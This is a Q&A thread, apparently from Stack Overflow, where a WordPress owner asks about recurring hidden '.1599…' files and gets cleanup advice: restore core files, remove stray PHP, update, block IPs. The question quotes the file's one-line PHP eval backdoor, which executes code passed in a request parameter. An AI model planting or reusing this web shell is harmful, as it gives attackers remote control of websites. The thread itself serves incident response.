-1

I've been monitoring my wordpress installation and from time to time a file gets created in places like /wp-content/mu-plugins/wp-nc-easywp/plugin/Http/Checker/

The file name always starts with .1599.... followed by random numbers ex. .1599674957 or .1599875789

The code inside this file is <?php @eval($_HEADERS["E"]);@eval($_REQUEST["E"]);

What I do is delete all files with the .1599* recursively in the wordpress folder.

How do I resolve this?

Thank you for the help

user3632739
  • 19
  • 4

1 Answers1

3

Your site is hacked. These are commonly inserted to your PHP files by hackers. You should:

  1. Find all files with this.
  2. Restore all of these files to their original state (either by downloading from WordPress.org or manually fixing)
  3. Remove any file that are not supposed to be in your WordPress.
  4. Find all PHP files in the WordPress upload folder and remove them (they should not be there anyway)
  5. Update your WordPress core and all plugins to the latest version to remove potential vunerabilities.

In general, you should keep regular backups. And you should frequently update your WordPress.

Koala Yeung
  • 7,475
  • 3
  • 30
  • 50
  • Thank you so much for your reply. I've been deleting the files with this code however they get recreated from time to time. – user3632739 Sep 11 '20 at 03:11
  • Check network access logs, block those frequently & regularly accessed IPs. – Raptor Sep 11 '20 at 03:26
  • If your hosting supports it, try to take down the site entirely and use shell / ssh / ftp to fix all files first. You need to get rid of all vunerabilities before exposing your site to the public. Try to use [.htaccess](https://stackoverflow.com/questions/4400154/deny-all-allow-only-one-ip-through-htaccess) to deny all access except your own IP, if possible. – Koala Yeung Sep 11 '20 at 04:55